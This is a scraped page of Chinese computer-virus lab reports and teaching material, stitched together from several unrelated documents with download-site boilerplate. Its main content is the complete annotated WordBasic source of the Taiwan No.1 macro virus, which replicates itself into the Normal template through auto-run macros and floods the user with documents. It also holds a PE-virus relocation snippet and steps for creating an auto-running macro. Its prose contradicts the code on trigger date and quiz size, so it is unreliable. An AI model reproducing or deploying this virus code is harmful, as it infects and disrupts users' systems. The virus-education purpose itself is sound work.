计算机病毒原理-台湾1号病毒实验报告
- 格式:doc
- 大小:1.76 MB
- 文档页数:15
病毒实验指导书上海交通大学信息安全工程学院2010年10月目录1、引导区病毒2、可执行文件病毒2.1 COM病毒2.2 PE病毒3、宏病毒3.1 美丽莎宏病毒3.2 台湾No.1宏病毒4、恶意脚本4.1 网络炸弹脚本4.2万花谷脚本4.3欢乐时光脚本5、蠕虫5.1 U盘蠕虫5.2 RPC漏洞蠕虫六、木马6.1 基本木马程序6.2 BO2K木马七、恶意代码检测实验附录一:虚拟机下安装DOS一、引导区病毒1.1 实验目的通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染染毒文件的方法,提高汇编语言的使用能力。
1.2 实验原理本实验采用的引导病毒样本是一个教学版的样本,引导含有这个病毒的软盘或硬盘都将触发它。
该病毒并不会做什么破坏,被感染的软盘或硬盘都可以恢复。
1.3 预备知识本实验需要如下的预备知识:1.引导病毒的基础知识,包括引导病毒的概念,引导扇区的位置和结构等。
2.BIOS常用中断的相关知识,包括对磁盘的读写和屏幕字符的打印等。
3.汇编语言基础,能独立阅读和分析汇编代码,掌握常用的汇编指令。
1.4 实验内容本实验需要完成的内容如下:1.引导阶段病毒由软盘感染硬盘实验。
通过触发病毒,观察病毒发作的现象和步骤学习病毒的感染机制;阅读和分析病毒的代码。
2.Dos运行时病毒由硬盘感染软盘的实现。
通过触发病毒,观察病毒发作的现象和步骤学习病毒的感染机制;阅读和分析病毒的代码。
1.5 实验环境VMWare Workstation 5.5.3MS-DOS 7.10实验素材:experiments目录下的bootvirus目录。
虚拟机:virtualmachine目录下的DOSVM目录。
1.6 实验步骤1.环境安装安装虚拟机VMWare,在虚拟机环境内安装MS-DOS 7.10环境。
安装步骤参考附录“如何在虚拟机上安装MSDOS?”如果直接下载虚拟机映像文件,则可以省去该部分。
病毒理论与防御技术实验报告2015年3月1日实验一:**********一、实验目的1)掌握PE文件格式。
2)了解PE病毒原理。
二、实验步骤1)阅读CVC杂志。
2)学习使用PE Explorer查看不同PE结构文件格式,如exe和dll。
3)文件型病毒演练。
a)实验测试的示例程序包由教师提供,解压后请从病毒包中取得Virus.exe拷贝在当前解压目录中即可运行病毒程序进行测试。
b)为了保持测试的一般性,我们采用的是一个常见的软件ebook;该测试包即为ebook安装目录下的所有程序。
c)测试时请依照软件提示进行,在测试中,我们发现该测试包还具有典型性特点:其中ebookcode.Exe 和 KeyMaker.exe 可以看成一组,它们在感染后能够明显的体现病毒的基本特征,故而杀毒软件Norton能够比较及时的查出是病毒程序;而ebookedit.exe 和 ebrand-it.exe 是另一类程序,它们在感染后很好地体现了病毒的隐藏的特征,在运行初期,杀毒程序很难查出其为病毒程序,只有在该程序感染其他可执行程序,在宿主程序中添加4k的节时,杀毒软件检测到该行为时才能判断是病毒程序。
三、思考题1、详细记录实验步骤、现象、问题。
实验现象:1)PE文件格式按节组织(section)->中病毒之后section number变多(多了一个IS节)中病毒之后Address of entry point程序入口点变化(调用子程序SUB_L0066D58B)2)中病毒文件中病毒文件也具有了感染其他文件的功能。
●病毒重定位:原因:病毒的生存空间就是宿主程序,而因为宿主程序的不同,所以病毒每次插入到宿主程序中的位置也不同。
那么病毒需要用到的变量的位置就无法确定。
这就是病毒首先要重定位的原因。
目的:找到基址举例:在几乎每个病毒的开头都用下面的语句:call deltadelta:pop ebp ;得到delta地址sub ebp,offset delta ;因为在其他程序中基址可能不是默认的所以需要重定位mov dword ptr [ebp+offset appBase],ebp;把扩展基址寄存器ebp中的内容(基址)存入内存appBase位置●API函数地址的获取:步骤:首先获得诸如kernel32.dll,user32.dll的基址,然后再找到真正的函数地址.2、写下你阅读CVC杂志后的读后感,你同意杂志的所表达的倾向吗,你觉得现阶段病毒肆虐和这样的倾向和认识有没有关系,为什么?CVC杂志很有意思,语言幽默,观点明确,并且总结了很多关于病毒的基础知识。
电脑病毒与防治实验报告电脑病毒是一种在计算机系统中传播并破坏数据或干扰正常运行的恶意软件。
在当今数字化社会,电脑病毒越来越成为人们日常生活中的一个隐患。
为了更好地了解电脑病毒的危害以及有效防治方法,我们进行了相关实验并撰写此报告。
### 实验目的通过实验,探讨电脑病毒对计算机系统的危害程度,以及采取何种方法可以有效防治电脑病毒的侵害。
### 实验材料1. 实验室计算机设备2. 各类电脑病毒样本3. 杀毒软件4. 防火墙软件### 实验步骤1. 收集各类型电脑病毒样本,包括文件病毒、网页病毒、邮件病毒等。
2. 将病毒样本分别输入实验室的计算机系统中,观察病毒对系统的影响。
3. 安装杀毒软件,并对感染病毒的计算机进行查杀和清除操作。
4. 启动防火墙软件,设置相关防护策略,阻止病毒入侵计算机系统。
5. 对比有无杀毒软件和防火墙软件的情况下,电脑系统的表现和安全性。
### 实验结果分析经过实验观察和对比分析,我们得出以下结论:1. 电脑病毒的危害程度较大,不仅会导致系统运行缓慢、文件丢失、数据泄露等问题,还可能对计算机系统进行破坏,使其无法正常使用。
2. 安装杀毒软件和启用防火墙软件是预防电脑病毒的有效措施。
杀毒软件可以及时查杀发现的病毒,防火墙软件可以阻止病毒入侵系统。
3. 电脑系统在有杀毒软件和防火墙软件保护下,运行更加稳定,数据更加安全,用户体验更好。
### 实验结论综上所述,电脑病毒对计算机系统的危害不可忽视,因此加强对电脑病毒的防治至关重要。
安装杀毒软件和防火墙软件是预防和治理电脑病毒的有效手段,建议广大用户定期更新杀毒软件和防火墙软件,并加强对网络安全的重视,保护个人和机构的信息安全。
通过本次实验,我们对电脑病毒及其防治方法有了更深入的了解,相信在未来的计算机使用中,将更加注重网络安全,提高电脑系统的安全防护意识。
愿我们的实验报告能为更多人提供有益的参考和启示。
台湾No.1病毒程序流程图:宏病毒实例分析:台湾No.1病毒源代码:Dim Shared nm(4)Sub MAINDisableInput 1 ‘禁止使用Ctrl+Break键If Day(Now())=13 Then ‘判断当前是否是13号try:On Error Goto 0 ‘关闭错误处理程序On Error Goto trytest=-1con=1 ‘con储存心算题的结果tog$=””‘题目字符串,显示在提示框中i=0While test=-1For i=0 to 4nm(i)=Int(Rnd()*10000) ‘产生5个随机整数con=con*nm(i) ‘计算累乘结果If i=4 Then ‘当产生完5个数后,将第五个数和tog$=tog$+Str$(nm(4))+”=?”“=?”加入tog$中,完成题目的产生Goto beg ‘转到beg标记处End iftog$=tog$+Str$(nm(i))+”*”‘将每次产生的数添加到tog$中Next ibeg:Beepans$=InputBox$(“今天是”+Date$()+”,跟你玩一个心算游戏”+Chr$(13)+”若你答错,只好接受震撼教育………………”+Chr$(13)+tog$,”台湾No.1 Macro Virus”) ‘弹出输入框,给出问题,等待用户输入答案,并将答案返回给ans$If RTrim$(LTrim$(ans$))=LTrim$(Str$(con)) Then‘判断输入的答案是否与ans$一样MsgBox “恭贺你答对了,按确定就告诉你想知道的……”,”台湾No.1 Macro Virus”FileNewDefault ‘若答对了,打开一个空白页CenterPara ‘居中显示FormatFont.Font=”细明体”,.Points=16,.Bold=1,.Underline=1‘设置字体格式BeepInsert “何为巨集病毒”‘插入字符串InsertPara ‘插入段落,即换行BeepInsert “答案:”Italic 1 ‘设为斜体Insert “我就是……”InsertParaInsertParaItalic 0 ‘取消斜体FormatFont.Font=”细明体”,.Points=16,.Bold=1,.Underline=1BeepInsert “如何预防巨集病毒”InsertParaBeepInsert “答案:”Italic 1Insert “不要看我……”Goto exit ‘转到exit标记,退出程序ElseFor j=1 to 20 ‘若答错,打开20个空白文档BeepFileNewDefaultNext jCenterParaFormatFont.Font=”细明体”,.Points=16,.Bold=1,.Underline=1Insert “巨集病毒”Goto try ‘打开完后转到try标记处End ifWendEnd if ‘破坏性代码结束nor=CountMacros(0) ‘计算Normal模版中的模块数目If nor>0 ThenFor kk=1 to norIf MacroName$(kk,0)=”AutoOpen” Then ‘Normal模版中有无AutoOpen宏t=1 ‘若有则将t标记为1End ifNext kkEnd ifFile$=FileName$() ‘获取当前文档的全名Feilm$=File$+”:AutoOpen”‘当前文档中的宏名If t<>1 Then ‘若没有AutoOpen宏则将文档中的MacroCOPY Filem$,”AutoOpen”宏复制自动宏MacroCOPY Filem$,”AutoNew”MacroCOPY Filem$,”AutoClose”End ifnor1=CountMacros(1) ‘计算当前文档中包含的模块数If nor1>0 ThenFor kkk=1 to nor1If MacroName$(kkk,1)=”AutoOpen” Then ‘当前文档中有无AutoOpen宏tt=1 ‘若有则将tt标记为1End ifNext kkkEnd ifIf tt<>1 Then ‘若没有AutoOpen宏则先将文档保FileSaveAs.Format=1 存为模版再把自身复制到文档中MacroCOPY ”AutoOpen”,Filem$End ifexit:End Sub。
计算机病毒实验报告计算机病毒实验报告引言:计算机病毒是一种恶意软件,可以对计算机系统造成破坏和损失。
为了更好地了解计算机病毒的特点和对计算机系统的影响,我们进行了一系列的实验。
本报告将详细介绍我们的实验过程、结果和结论。
实验一:病毒传播方式我们首先研究了计算机病毒的传播方式。
通过在一个封闭的网络环境中模拟实验,我们发现计算机病毒主要通过电子邮件、可移动存储设备和互联网下载等方式进行传播。
这些传播方式都依赖于用户的不慎操作或者系统的漏洞。
实验二:病毒对系统性能的影响我们接着研究了计算机病毒对系统性能的影响。
在一个实验环境中,我们分别在未感染和感染病毒的计算机上进行了性能测试。
结果显示,感染病毒的计算机在运行速度、响应时间和网络连接方面都明显下降。
这是因为计算机病毒会占用系统资源、干扰正常的进程和网络通信。
实验三:病毒防护措施为了更好地保护计算机系统免受病毒攻击,我们进行了一系列的病毒防护措施实验。
我们测试了不同的杀毒软件和防火墙,并对其进行了性能和效果的评估。
结果显示,合适的杀毒软件和防火墙可以有效地检测和阻止病毒的传播,保护计算机系统的安全。
实验四:病毒对个人隐私的威胁除了对系统性能的影响,计算机病毒还可能对个人隐私造成威胁。
我们进行了一项实验,模拟了一个病毒窃取个人信息的场景。
通过在一台计算机中安装了一个窃取密码的病毒,我们发现该病毒能够成功获取用户的登录信息和敏感数据。
这个实验结果提醒我们,保护个人隐私是非常重要的,我们应该谨慎对待未知来源的文件和链接。
结论:通过一系列的实验,我们对计算机病毒有了更深入的了解。
计算机病毒的传播方式多种多样,主要依赖于用户的不慎操作和系统的漏洞。
感染病毒会导致计算机系统性能下降,并可能对个人隐私造成威胁。
为了保护计算机系统的安全,我们应该采取合适的病毒防护措施,如安装杀毒软件和防火墙,并且要时刻保持警惕,不轻易打开未知来源的文件和链接。
总结:计算机病毒是现代计算机系统中的一大威胁,对系统性能和个人隐私都有着巨大的影响。
计算机病毒实验报告(最新版)编制人:__________________审核人:__________________审批人:__________________编制单位:__________________编制时间:____年____月____日序言下载提示:该文档是本店铺精心编制而成的,希望大家下载后,能够帮助大家解决实际问题。
文档下载后可定制修改,请根据实际需要进行调整和使用,谢谢!并且,本店铺为大家提供各种类型的实用范文,如报告范文、工作总结、文秘知识、条据书信、行政公文、活动报告、党团范文、其他范文等等,想了解不同范文格式和写法,敬请关注!Download tips: This document is carefully compiled by this shop. I hope that after downloading it, it can help you solve practical problems. The document can be customized and modified after downloading, please adjust and use it according to actual needs, thank you!In addition, this shop provides you with various types of practical sample essays, such as report sample essays, work summary, secretarial knowledge, article letters, administrative official documents, activity reports, party group sample essays, other sample essays, etc. I want to understand the format and writing of different sample essays. stay tuned!正文内容说明1.本课程作业报告是《计算机病毒与反病毒》课程成绩评定的重要依据,须认真完成。
计算机病毒实验报告
《计算机病毒实验报告》
近年来,计算机病毒成为了网络安全的重要问题。
为了深入研究计算机病毒的特性和对网络系统的影响,我们进行了一系列的实验。
在实验中,我们选择了几种常见的计算机病毒样本,并对其进行了分析和测试。
首先,我们对这些病毒样本进行了静态分析,包括对其代码结构、功能特性和传播途径的研究。
通过反汇编和代码审查,我们成功地分析出了这些病毒的工作原理和传播方式。
我们发现,这些病毒样本大多采用了文件传播和网络传播的方式,利用漏洞和弱密码等手段感染目标系统。
其次,我们对这些病毒样本进行了动态分析,包括在受控环境下的运行实验和行为监测。
通过在虚拟机环境中模拟感染过程,我们成功地捕获了这些病毒的行为数据,并对其进行了深入分析。
我们发现,这些病毒样本在感染目标系统后,会对系统文件进行篡改、窃取用户信息或者发起网络攻击等恶意行为。
最后,我们对这些病毒样本进行了安全性测试,包括针对其传播途径和感染后的影响进行了模拟实验。
通过在受控网络环境中模拟病毒传播和感染过程,我们成功地验证了这些病毒的危害性,并提出了相应的防范措施和安全建议。
通过这些实验,我们深入了解了计算机病毒的特性和对网络系统的影响,为进一步加强网络安全提供了重要的数据支持和科学依据。
我们希望通过我们的研究成果,能够为网络安全领域的相关工作提供有益的参考和借鉴,共同维护网络安全和信息安全的大局。
电脑病毒的危害及防御1102班组长:周家炜一、问题的提出。
我家的电脑有时候会中病毒,病毒会使电脑的网速变慢,电脑还会经常死机。
不少同学家里的的电脑也会中病毒,病毒给我们带来了不少麻烦。
所以,我对电脑病毒这一问题,做了个简单的研究调查。
二、研究调查的数据整理。
1、电脑病毒的认识和了解。
计算机病毒(Computer Virus)在《中华人民共和国计算机信息系统安全保护条例》中被明确定义,病毒指“编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码”。
而在一般教科书及通用资料中被定义为:利用计算机软件与硬件的缺陷,由被感染机内部发出的破坏计算机数据并影响计算机正常工作的一组指令集或程序代码。
计算机病毒最早出现在70年代David Gerrold 科幻小说When H.A.R.L.I.E. was One.最早科学定义出现在1983:在Fred Cohen (南加大) 的博士论文“计算机病毒实验”“一种能把自己(或经演变)注入其它程序的计算机程序”启动区病毒,宏(macro)病毒,脚本(script)病毒也是相同概念传播机制同生物病毒类似.生物病毒是把自己注入细胞之中。
电脑病毒是一些心术不正的人恶意制造的电脑程序。
它对电脑进行不同程度的破坏,一些木马程序能在人们不知情的情况下潜入电脑盗取他人信息,或对电脑实行非法控制。
制造电脑病毒就像投毒一样,是一种危害社会的犯罪行为。
目前,已经发现的电脑病毒种类越来越多,像“熊猫烧香”病毒、“CIH”病毒、“冲击波”病毒、QQ消息尾巴病毒等。
2、电脑病毒的传播途径。
电脑病毒主要是以附件的形式进行传播,由于人们可以将任何类型的文件做为附件发送,而大部分电脑病毒防护软件在这方面的功能也不是十分完善,使得电子邮件成为当今世界上传播电脑病毒最主要的途径。
主要通过复制文件,文件传送,运行程序等方式进行。
它的传播媒介主要有以下几种;(1)硬盘传播:由于带病毒的硬盘在本地或者移到其他地方使用,维修等被病毒传染并将其扩散。
计算机病毒的实验报告计算机病毒的实验报告摘要:计算机病毒是一种具有破坏性的恶意软件,能够感染计算机系统并对其进行破坏。
本实验通过模拟计算机病毒的传播过程,探究病毒的特性和防范措施。
实验结果表明,计算机病毒具有隐蔽性、传播性和破坏性,而防病毒软件和用户的安全意识是有效防范计算机病毒的重要手段。
引言:随着计算机技术的不断发展,计算机病毒作为一种具有破坏性的恶意软件,给计算机系统的安全带来了巨大威胁。
为了深入了解计算机病毒的特性和传播方式,本实验模拟了计算机病毒的传播过程,并对病毒的特性进行了研究。
实验方法:1. 实验环境:使用一台具备网络连接功能的计算机作为实验主机。
2. 实验过程:在实验主机上安装一个模拟计算机病毒的程序,并设置病毒传播路径。
3. 实验观察:观察计算机病毒在实验主机上的传播情况,记录病毒感染的时间和影响范围。
4. 实验分析:分析计算机病毒的传播速度、感染方式和破坏程度。
实验结果:通过实验观察和数据记录,我们得到了以下实验结果:1. 计算机病毒的传播速度较快:在实验主机上设置病毒传播路径后,病毒很快感染了整个计算机系统,包括操作系统和应用程序。
2. 计算机病毒具有隐蔽性:病毒在感染过程中能够隐藏自身,不易被用户察觉。
这使得病毒能够长时间存在于计算机系统中,对系统进行潜在的破坏。
3. 计算机病毒的传播方式多样:病毒可以通过网络传播,如电子邮件、恶意链接等;也可以通过可移动存储介质传播,如U盘、移动硬盘等。
这些传播方式使得病毒能够迅速传播到其他计算机系统,形成病毒的流行。
4. 计算机病毒的破坏程度较大:病毒在感染计算机系统后,可以破坏文件、删除重要数据、篡改系统设置等,给用户带来严重的损失。
实验讨论:通过以上实验结果,我们可以得出以下结论:1. 防病毒软件是有效防范计算机病毒的重要手段。
及时更新病毒库、进行定期扫描和实时监测,可以有效阻止病毒的感染和传播。
2. 用户的安全意识也是防范计算机病毒的重要因素。
计算机病毒原理及其防范实验报告学院专业:理学院信息安全学号:1108105075姓名:李建涛木马病毒1基本木马程序1.1 实验目的掌握木马病毒的基本原理。
1.2 实验原理用木马程序进行网络入侵,从过程上看大致可分为六步:配置木马(实现伪装和信息反馈)、传播木马(通过E-mail 、病毒和软件等)、运行木马、信息获取、建立连接和远程控制(实现对受害者的控制)。
其中建立连接的过程如图6-1-1所示。
B A 控制端服务端(1)建立连接前202.120.0.100①②③④①控制端I P ②木马端口③服务端端口④服务端I P?(2)获得服务器端I P(3)木马连接建立A B76 26202.120.0.100202.99.99.10110 37通过信息 反馈或I P 扫描获得服 务器I P 地址76 26图6-1-1 木马建立连接示意图在图6-1-1中,A 机为控制端,B 机为服务端。
对于A 机来说,要与B 机创建连接就必须知道B 机的木马端口和IP 地址,由于木马端口是A 机事先设定的,所以最重要的是如何获得B 机的IP 地址。
获得B 机的IP 地址的方法主要有两种:信息反馈和IP 扫描。
信息反馈是指服务端主动反馈信息给控制端。
因为B 机装有木马程序,所以它的木马端口7626是处于开放状态的,所以现在A 机只要扫描IP 地址段中7626端口开放的主机就行了。
图中B 机的IP 地址是202.96.96.101,当A 机扫描到这个IP 时发现它的7626端口是开放的,那么这个IP 就会被添加到列表中,这时A 机就可以通过木马的控制端程序向B 机发出连接信号,B 机中的木马程序收到信号后立即作出响应,当A 机收到响应的信号后,开启一个随即端口1031与B 机的木马端口7626建立连接,这时一个木马连接才算真正建立。
由于拨号上网的IP 是动态的,即每次上网的IP 都是不同的,但是这个IP 是在一定范围内变动的,因此,一般来说控制端都是先通过信息反馈获得服务端的IP 地址,然后再进行IP 扫描。
计算机病毒
实验报告
姓名:
学号:
老师:
日期:
一. 实验目的
台湾1号病毒是一种破坏力较大的宏病毒!Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。
本实验演示了宏的编写,通过台湾1号病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。
二. 实验内容
1. macro virus中的内容
2.计算机病毒篇 ---->计算机宏病毒
三. 实验环境
1. macro virus
硬件设备:局域网,终端PC机。
系统软件:Windows系列操作系统
支撑软件:Word 2003
软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问.
实验环境配置如下图所示:
受感染终端受感染
Word 文档
被感染终端
2.计算机宏病毒
硬件设备:部署 WIN2003 系统的PC 机一台
软件工具:Office word2007
四.实验步骤及截图
台湾1号病毒代码
Taiwan No.1 病毒原始码
Dim Shared nm(4)
Sub MAIN
DisableInput 1
If Day(Now()) = 13 Then
try:
On Error Goto 0
On Error Goto try
test = - 1
con = 1
tog$ = ""
i = 0
While test = - 1
For i = 0 To 4
nm(i) = Int(Rnd() * 10000)
con = (con * nm(i))
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + " =?"
Goto beg
End If
tog$ = tog$ + Str$(nm(i)) + " *"
Next i
rem 随机选出四个千位数, 以便等一下的游戏
Beep
rem 电脑发出" 哔"一声
ans$ = InputBox$("今天是" + Date$() + " ,跟你玩一个心算游戏" + Chr$(13) + /
"若你答错,只好接受震撼教育.............." + Chr$(13) + /
tog$, "台湾NO.1 Macro Virus")
rem 开个对话盒, 以便输入解答用
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
MsgBox "恭贺你答对了,按确定就告诉你想知道的....", /
"台湾NO.1 Macro Virus"
FileNewDefault
CenterPara
FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Beep
Insert "何谓巨集病毒?"
InsertPara
Insert "答案:"
Italic 1
Insert "我就是....."
InsertPara
InsertPara
Italic 0
FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Beep
Insert "如何预防巨集病毒?"
InsertPara
Beep
Insert "答案:"
Italic 1
Insert "不要看我....."
Goto exit
Else
For j = 1 To 20
Beep
FileNewDefault
Next j
CenterPara
FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Insert "巨集病毒"
Goto try
End If
Wend
End If
nor = CountMacros(0)
If nor > 0 Then
For kk = 1 To nor
If MacroName$(kk, 0) = "AutoOpen" Then t = 1
End If
Next kk
End If
file$ = FileName$()
filem$ = file$ + ":AutoOpen"
If t <> 1 Then
MacroCopy filem$, "AutoOpen"
MacroCopy filem$, "AutoNew"
MacroCopy filem$, "AutoClose"
End If
nor1 = CountMacros(1)
If nor1 > 0 Then
For kkk = 1 To nor1
If MacroName$(kkk, 1) = "AutoOpen" Then tt = 1
End If
Next kkk
End If
If tt <> 1 Then
FileSaveAs .Format = 1
MacroCopy "AutoOpen", filem$
End If
exit:
End Sub
该病毒的效果如下:当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是1日(即在每月的1日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:
何谓宏病毒
答案:我就是......
将系统日期设为XX月1号
如果答错,就会不停地刷屏,然后继续让你答题,否则跳出如下界面:
计算机宏病毒
1). 新建Word 文档并打开
2). 调出开发工具,设置宏的等级,启用宏
3). 创建宏,命名AutoExec 编辑
4). 编辑宏,语法上注意VBA 版本保存
5). 关闭所有Word(必须)
6). 再次打开Word 文档,宏病毒爆发,弹出刚刚编写的msgbox 窗口
7). 启动任务管理器结束进程
搜索winword.exe 文件,并确定复制其位置
8). 启用CMD,定位winword 位置:
输入命令,用参数来打开安全模式winword.exe /a(执行此命令2 次)第一次安全模式
第二次新建文档
进行宏的打开设置来禁用宏
9). 搜索normal.dotm 等模板文件,若搜索不出东西,在高级选项中选中搜索隐藏文件及系统文件即可,并删除那个文件夹下的所有模板
10). 简易摆脱宏完成,重新打开word,没有被感染。
五. 总结与心得
在使用电脑的过程中,我们要加强电脑的安全指数,要有防范意识,防止网络病毒的入侵!特别是在现代网络发达的社会,一旦被高级病毒入侵,很有可能带来重大损失!同时也应该学好病毒知识,这样,我们就可以知道如何去解决病毒问题,让我们免受损失!。